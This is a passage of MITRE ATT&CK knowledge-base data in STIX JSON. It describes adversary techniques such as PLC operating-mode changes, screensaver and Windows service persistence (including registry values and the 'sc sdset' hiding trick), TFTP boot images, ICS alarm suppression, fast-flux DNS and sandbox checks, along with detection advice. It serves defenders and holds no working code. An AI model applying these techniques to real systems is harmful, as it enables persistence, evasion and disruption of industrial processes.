+ "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:01.367Z", + "name": "Change Operating Mode", + "description": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0858", + "external_id": "T0858" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Screensaver", + "description": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations. \n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Bartosz Jerzman" + ], + "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1180", + "external_id": "T1180" + }, + { + "source_name": "Wikipedia Screensaver", + "description": "Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.", + "url": "https://en.wikipedia.org/wiki/Screensaver" + }, + { + "source_name": "ESET Gazer Aug 2017", + "description": "ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "TFTP Boot", + "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "created": "2020-10-20T00:06:56.180Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/005", + "external_id": "T1542.005" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Command History", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Boot Information", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#26" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:01.578Z", + "name": "Alarm Suppression", + "description": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.\n\nA Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: \n\n* An alarm raised by a protocol message \n* An alarm signaled with I/O \n* An alarm bit set in a flag (and read) \n\nIn ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Marina Krotofil", + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process History/Live Data", + "Operational Databases: Device Alarm", + "Operational Databases: Process/Event Alarm" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0878", + "external_id": "T0878" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-11T19:25:51.394Z", + "name": "Windows Service", + "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward", + "Pedro Harrison", + "Mayuresh Dani, Qualys", + "Wietze Beukema, @wietze", + "Akshat Pradhan, Qualys", + "Wirapong Petshagun" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "created": "2020-01-17T19:13:50.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1543/003", + "external_id": "T1543.003" + }, + { + "source_name": "Microsoft Windows Event Forwarding FEB 2018", + "description": "Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.", + "url": "https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + }, + { + "source_name": "SANS 1", + "description": "Joshua Wright. (2020, October 13). Retrieved March 22, 2024.", + "url": "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/" + }, + { + "source_name": "SANS 2", + "description": "Joshua Wright. (2020, October 14). Retrieved March 22, 2024.", + "url": "https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/" + }, + { + "source_name": "TechNet Services", + "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx" + }, + { + "source_name": "Microsoft 4697 APR 2017", + "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.", + "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697" + }, + { + "source_name": "Symantec W.32 Stuxnet Dossier", + "description": "Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "source_name": "Unit42 AcidBox June 2020", + "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.", + "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "Crowdstrike DriveSlayer February 2022", + "description": "Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.", + "url": "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Fast Flux DNS", + "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "created": "2020-03-11T14:11:16.560Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568/001", + "external_id": "T1568.001" + }, + { + "source_name": "MehtaFastFluxPt1", + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref" + }, + { + "source_name": "MehtaFastFluxPt2", + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + }, + { + "source_name": "Fast Flux - Welivesecurity", + "description": "Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work?. Retrieved March 11, 2020.", + "url": "https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T12:49:40.919Z", + "name": "System Checks", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Deloitte Threat Library Team", + "Kostya Vasilkov" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Static File Analysis", + "Signature-based detection", + "Host forensic analysis", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "created": "2020-03-06T20:57:37.959Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1497/001", + "external_id": "T1497.001" + }, + { + "source_name": "Unit 42 OilRig Sept 2018", + "description": "Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" + }, + { + "source_name": "McAfee Virtual Jan 2017", + "description": "Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.", + "url": "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/" + }, + { + "source_name": "Deloitte Environment Awareness", + "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", + "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:01.778Z", + "name": "Detect Operating Mode", + "description": "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0868", + "external_id": "T0868" + 